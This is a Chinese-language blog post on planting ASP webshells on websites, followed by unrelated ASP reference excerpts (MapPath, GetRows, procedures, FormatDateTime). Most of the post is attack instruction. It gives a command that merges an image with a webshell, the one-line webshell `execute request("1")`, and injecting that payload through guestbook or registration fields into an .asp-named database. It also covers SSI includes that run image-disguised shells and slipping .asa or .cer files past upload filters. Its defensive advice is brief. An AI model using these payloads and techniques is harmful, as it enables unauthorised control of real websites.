关于 asp 木马
一、木马生成
asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用
图片和木马合并命令:
copy 1.gif /b + asp.asp /a asp.gif
二、木马上传
如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。
1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中插入一句话木马(<%execute request("1")%>),然后利用一句话木马上传一个完整木马。
2、如果网站后台允许修改网站联系信息等页面,而且页面也是也是以asp存储,那么可以利用asp的包含文件,巧妙的令jpg、bmp等格式木马得以运行。比如在其中插入
<!-- #include file=/upload/****.jpg -->
3、还可以看看网站上传类型是否有严格的过滤,如果仅仅是限制了asp文件,那么可以尝试上传asa、cer等等。
作为技术性问题,可以这样实现。
一般情况下,在留言板、个人注册等地方,需要个人信息。
而且在进行个人信息中的个人主页、邮件地址等信息,不会有太严格的过滤。这就为插入一句话木马提供了可能性。
举例说明:我给一个网站留言,我在填写我的“个人主页”或者“email”时,不输入真实信息。而输入一句话木马。这样,只要知道了asp数据库地址,那么提交一句话木马后,直接访问asp数据库就可运行木马了。
所以,很多人把acess数据库改名为asp以防止下载,岂不知危害照样存在,只不过换了一种方式而已。
三、如何防护
1、是的,对方猜出正确的数据库路径的几率和同一地点被雷集中两次几率几乎相同。但是需要注意的是在写连接数据库文件时,注意防止暴库
2、是的,而且如果你的数据库不是以asp存放,那么就无所谓了。
3、这个问题有点大。估计网上的讨论也没有停止过,个人认为也没有标准答案。不过,我认为安全是一个整体,必须从多个方面考虑,以分层次防御的方法无疑是一个好办法。
我自己通常是从两个层次进行防护,其一就是数据库改名(包括文件名和后缀名)最好改为你自己
相关文档:
1.如何用Asp判断你的网站的虚拟物理路径
答:使用Mappath方法
< p align="center" >< font size="4" face="Arial" >< b >
The Physical path to this virtual website is:
< /b >< /font >
< font color="#FF0000" size="6" face="Arial" >
< %= Server.MapPath("\")% >
......
本文转自:http://hi.baidu.com/viewhainan/blog/item/663d68605e7de942ebf8f80a.html
GetRows()方法
是将数据从 Recordset 复制到二维数组中,这是一个二维数组,第一个下标标识字段,第二个则标识记录号,所以 rsArray = rs.GetRows() rsArray(0, 0)就表示记录集第一行的第一字段值 rsArray(1, 0)就 ......
编写过程
过程是一组能执行指定任务且具有返回值的脚本命令。您可以定义自己的过程,然后在脚本中反复调用它们。
您可以将过程定义放在调用过程的 .asp 文件中,也可以将通用过程放在一个共享的 .asp 文件中,然后用 SSI #include 指令将其包含进其他调用其过程的 .asp 文件中。您还可选择另一种方法,即把这些功能打包 ......
FormatDateTime
返回表达式,此表达式已被格式化为日期或时间。
FormatDateTime(Date[, NamedFormat])
参数
Date
必选项。要被格式化的日期表达式。
NamedFormat
可选项。指示所使用的日期/时间格式的数值,如果省略,则使用 vbGeneralDate。
设置
NamedFormat 参数可以有以下值:
常数 值 描述
vbGeneralDate ......